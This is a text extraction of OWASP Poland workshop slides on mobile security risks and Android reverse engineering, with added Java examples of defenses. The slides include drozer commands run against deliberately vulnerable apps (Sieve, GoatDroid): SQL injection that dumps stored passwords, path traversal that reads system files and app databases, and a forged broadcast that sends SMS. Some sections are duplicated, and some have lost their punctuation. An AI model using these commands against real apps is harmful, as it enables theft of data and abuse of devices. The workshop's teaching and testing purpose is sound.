bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use.
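The two Intent-side mitigations above, as an added example written for this page (it is not code from the workshop or from any project it mentions): internal hand-offs use an explicit Intent that names the target component, and a deep-link entry point validates the URI it receives before acting on it, which is the check the UniversalMDMClient case lacked. The class names, the host allowlist and the "payload" extra are assumptions.

```java
// Added example, not from the slides: explicit Intents for internal IPC and
// validation of data arriving through an exported entry point.
// Class names, the "payload" extra and the host allowlist are assumptions.
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.util.Arrays;
import java.util.List;

public final class IntentHygiene {

    // Internal communication: the target component is named explicitly, so no
    // other app can register a matching intent-filter and receive this Intent.
    public static Intent internalIntent(Context ctx, Class<?> target, String payload) {
        Intent i = new Intent(ctx, target);      // explicit: package + class are fixed
        i.setPackage(ctx.getPackageName());      // restricts resolution to this package as well
        i.putExtra("payload", payload);
        return i;
    }

    // Hosts this app is willing to open links for (assumed allowlist).
    private static final List<String> ALLOWED_HOSTS = Arrays.asList("owasp.org", "www.owasp.org");

    /** Returns the URI only if it is an https link to an allowlisted host, otherwise null. */
    public static Uri validateIncomingUri(Uri data) {
        if (data == null) return null;
        if (!"https".equalsIgnoreCase(data.getScheme())) return null;   // no custom schemes
        String host = data.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase())) return null;
        String path = data.getPath();
        if (path != null && path.contains("..")) return null;            // no traversal fragments
        return data;
    }

    /** Activity reachable via a deep link; it never acts on unchecked input. */
    public static class LinkActivity extends Activity {
        @Override
        protected void onCreate(Bundle saved) {
            super.onCreate(saved);
            Uri safe = validateIncomingUri(getIntent().getData());
            if (safe == null) {
                finish();                        // reject: open or install nothing
                return;
            }
            // Hand off with an explicit Intent; the receiving component is ours.
            startActivity(internalIntent(this, ViewerActivity.class, safe.toString()));
        }
    }

    /** Placeholder target of the explicit Intent (assumed). */
    public static class ViewerActivity extends Activity { }
}
```

Note that `validateIncomingUri` is a pure function, so it can be unit-tested on the JVM with inputs such as `smdm://` or `https://evil.example/` without an emulator.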
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem.
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify if:
– a session expires (copy a cookie and try to use it after 30 minutes)
– a session is destroyed after the authentication state changes (e.g. switching from any logged in user to another logged in user)
– you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
JAR DEXJAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modify Smali Files
Demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file.
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device.
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems are, again, permissions:
run app.provider.info --permission null
Content providers attacks
• Unrestricted access to app database
– Just query it – run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command.
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks – unrestricted access to app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks – SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password | pin |
| thisismypassword | 9876 |
Content providers attacks – path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
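The defender's side of the Sieve session above, as an added example written for this page (it is neither Sieve's nor the workshop's code): a content provider whose `query()` can no longer be bent with a `'` or `* FROM Key;--` projection, and whose file access cannot be walked out of its directory. It closes both the "SQL injection to local db" and the "directory traversal" items listed under M7 as well. The table layout, column names and backup directory are assumptions.

```java
// Added example, not from the slides: a content provider hardened against
// SQL injection (projection map + strict mode + bound arguments) and path
// traversal (canonical-path containment). Schema and directory are assumed.
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

public class HardenedProvider extends ContentProvider {
    // Only these logical names may appear in a projection or selection. The
    // "password" column is deliberately absent, so it cannot be read through us,
    // and an unknown name such as "* FROM Key;--" raises IllegalArgumentException.
    private static final Map<String, String> PASSWORD_COLUMNS = new HashMap<>();
    static {
        PASSWORD_COLUMNS.put("_id", "_id");
        PASSWORD_COLUMNS.put("service", "service");
        PASSWORD_COLUMNS.put("username", "username");
    }

    private static final class DbHelper extends SQLiteOpenHelper {
        DbHelper(Context c) { super(c, "database.db", null, 1); }   // assumed schema
        @Override public void onCreate(SQLiteDatabase db) {
            db.execSQL("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB)");
        }
        @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
    }
    private SQLiteOpenHelper helper;

    @Override public boolean onCreate() { helper = new DbHelper(getContext()); return true; }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("Passwords");
        qb.setProjectionMap(PASSWORD_COLUMNS);
        qb.setStrict(true);   // selection may only reference mapped columns; unbalanced quotes are rejected
        SQLiteDatabase db = helper.getReadableDatabase();
        // Caller-supplied values travel only as bound parameters, never as SQL text.
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    /** Resolves the requested file and refuses anything outside backupDir ("../" included). */
    static File resolveBackupFile(File backupDir, String requestedPath) throws IOException {
        File base = backupDir.getCanonicalFile();
        File target = new File(base, requestedPath).getCanonicalFile();   // "/etc/hosts" becomes base/etc/hosts
        if (!target.getPath().startsWith(base.getPath() + File.separator)) {
            throw new IOException("path escapes backup directory: " + requestedPath);
        }
        return target;
    }

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) throw new FileNotFoundException("read-only provider");
        try {
            File f = resolveBackupFile(new File(getContext().getFilesDir(), "backup"), uri.getPath());
            return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
        } catch (IOException e) {
            throw new FileNotFoundException(e.getMessage());
        }
    }

    // Writes are not offered by this provider.
    @Override public Uri insert(Uri uri, ContentValues v) { throw new UnsupportedOperationException(); }
    @Override public int delete(Uri uri, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { throw new UnsupportedOperationException(); }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.password"; }
}
```

`resolveBackupFile` is a plain static method, so the traversal check can be tested on the JVM: a request for `../../etc/hosts` must throw, while `notes.txt` must resolve inside the base directory. The manifest should still mark the provider `android:exported="false"` or guard it with a permission; the code above limits what an allowed caller can do, not who may call.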
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements, such as Battery Low, boot completed, headset plug etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies for all abovementioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
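The two general defenses applied to the GoatDroid receiver shown above, as an added example for this page (not GoatDroid's or the workshop's code); the same manifest attributes protect services and activities. The manifest lines sit in a comment because this page's examples are Java; the permission name, the number pattern and the length limit are assumptions.

```java
// Added example, not GoatDroid's code: SendSMSNowReceiver with the general
// defenses applied. Permission name, number pattern and length limit are assumed.
//
// Manifest side (assumed):
//   <permission android:name="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS"
//               android:protectionLevel="signature" />
//   <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
//             android:exported="false"
//             android:permission="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS" />
// exported="false": only code running under this app's UID can deliver the broadcast.
// The signature-level permission is the second layer for a receiver that must stay
// exported: only apps signed with the same key can hold it.
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.SmsManager;
import java.util.regex.Pattern;

public class SendSMSNowReceiver extends BroadcastReceiver {
    static final String ACTION_SOCIAL_SMS = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    // Digits with optional leading "+" only (assumed policy): no premium short codes, no letters.
    private static final Pattern NUMBER = Pattern.compile("^\\+?[0-9]{6,15}$");
    private static final int MAX_MESSAGE_LEN = 160;

    /** Pure validation step, kept separate so it can be unit-tested without Android. */
    static boolean isAcceptable(String action, String phoneNumber, String message) {
        if (!ACTION_SOCIAL_SMS.equals(action)) return false;
        if (phoneNumber == null || !NUMBER.matcher(phoneNumber).matches()) return false;
        if (message == null || message.isEmpty() || message.length() > MAX_MESSAGE_LEN) return false;
        return true;
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Even with the manifest guards in place, the extras are still untrusted input:
        // the original code passed them straight into sendTextMessage.
        String number = intent.getStringExtra("phoneNumber");
        String text = intent.getStringExtra("message");
        if (!isAcceptable(intent.getAction(), number, text)) {
            return;   // drop malformed or unexpected requests
        }
        SmsManager.getDefault().sendTextMessage(number, null, text, null, null);
    }
}
```

With `exported="false"` the `app.broadcast.send` command from the previous slide is rejected by the system before `onReceive` runs; the input check is defence in depth for the case where a future change exports the receiver again.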
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data-stores on the device in an insecure (plain text or reversible encoding) format.
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML Data Stores
– Plain text configuration files
– Cookie stores
– SD Card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes in sdcard before and after installing the application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of a certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in source code: the expected X.509 certificate or public key
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
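The pseudocode above made concrete, as an added example for this page (not the workshop's code): public-key pinning layered on top of the platform's normal chain validation, so the app neither trusts all certificates nor accepts all hostnames, the two failures the next slide reports. The pin values and URL are placeholders; the pin of a real server is the SHA-256 of the DER-encoded SubjectPublicKeyInfo of its certificate, which is what `pinOf` computes.

```java
// Added example, not from the slides: public-key pinning as an extra check
// after the default TrustManager and HostnameVerifier have run.
// The pin strings and the URL are placeholders.
import android.util.Base64;
import java.io.IOException;
import java.net.URL;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.Certificate;
import java.util.Arrays;
import java.util.List;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLPeerUnverifiedException;

public final class PublicKeyPinning {
    // Placeholder pins: the current key plus a backup key so rotation does not brick the app.
    private static final List<String> PINS = Arrays.asList(
            "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
            "sha256/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=");

    /** "sha256/" + base64(SHA-256(SubjectPublicKeyInfo)) for one certificate. */
    static String pinOf(Certificate cert) throws NoSuchAlgorithmException {
        byte[] spki = cert.getPublicKey().getEncoded();       // DER SubjectPublicKeyInfo
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(spki);
        return "sha256/" + Base64.encodeToString(digest, Base64.NO_WRAP);
    }

    /** True if any certificate in the presented chain (leaf or intermediate) matches a pin. */
    static boolean chainMatchesPin(Certificate[] chain, List<String> pins) throws NoSuchAlgorithmException {
        for (Certificate c : chain) {
            if (pins.contains(pinOf(c))) return true;
        }
        return false;
    }

    public static HttpsURLConnection openPinned(String url) throws IOException, NoSuchAlgorithmException {
        HttpsURLConnection conn = (HttpsURLConnection) new URL(url).openConnection();
        // No custom TrustManager or HostnameVerifier is installed: chain validation and
        // host name checking still happen in connect(). The pin is added, not substituted.
        conn.connect();
        if (!chainMatchesPin(conn.getServerCertificates(), PINS)) {
            conn.disconnect();
            throw new SSLPeerUnverifiedException("certificate chain does not match pinned public keys");
        }
        return conn;   // safe to read the response from here on
    }
}
```

Pinning the public key rather than the whole certificate survives certificate renewal with the same key, and keeping a backup pin lets the key itself be rotated; both pins should live in code or in a signed configuration, never be fetched from the server being pinned.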
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL Caching
• Copy/Paste buffer Caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crashlogs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
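The "never log sensitive information" mitigation as an added example for this page (not the workshop's code): a logging wrapper that is silent in release builds and redacts recognisable secrets even in debug builds, so a token pasted into a debug line does not end up in logcat or a crash log. `BuildConfig.DEBUG` is the flag the Android Gradle plugin generates for each app; the redaction patterns are assumptions and should be extended with whatever identifiers the application handles.

```java
// Added example, not from the slides: debug-only, redacting log wrapper.
// BuildConfig.DEBUG is the Gradle-generated build flag; patterns are assumed.
import android.util.Log;
import java.util.regex.Pattern;

public final class SafeLog {
    private static final boolean ENABLED = BuildConfig.DEBUG;   // false in release builds

    // Secret-looking fragments that are masked before anything reaches logcat.
    private static final Pattern BEARER = Pattern.compile("(?i)(authorization:\\s*bearer\\s+)\\S+");
    private static final Pattern KV_SECRET = Pattern.compile("(?i)\\b(password|passwd|pwd|token|session|apikey)=\\S+");
    private static final Pattern CARD_LIKE = Pattern.compile("\\b[0-9]{13,19}\\b");   // PAN-length digit runs

    /** Masks recognised secrets; applied to every message, even in debug builds. */
    static String redact(String msg) {
        if (msg == null) return null;
        String out = BEARER.matcher(msg).replaceAll("$1[REDACTED]");
        out = KV_SECRET.matcher(out).replaceAll("$1=[REDACTED]");
        out = CARD_LIKE.matcher(out).replaceAll("[REDACTED]");
        return out;
    }

    /** Debug output: compiled to a no-op branch in release builds. */
    public static void d(String tag, String msg) {
        if (ENABLED) Log.d(tag, redact(msg));
    }

    /** Errors are worth keeping in release builds, but only as redacted text. */
    public static void e(String tag, String msg, Throwable t) {
        Log.e(tag, redact(msg), t);
    }
}
```

`redact` is deliberately a plain static method: a JVM unit test can assert that `redact("login?token=abc123")` yields `login?token=[REDACTED]` without an emulator. Stack traces passed as the `Throwable` are not redacted, so exception messages must themselves be free of secrets.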
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1 etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAUTH tokens
• Do not store keys on a device. Use password based encryption instead.
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, „incorrectly”?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
    if (presented_cert == pinned_cert)
        Start_connection()
    else
        Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
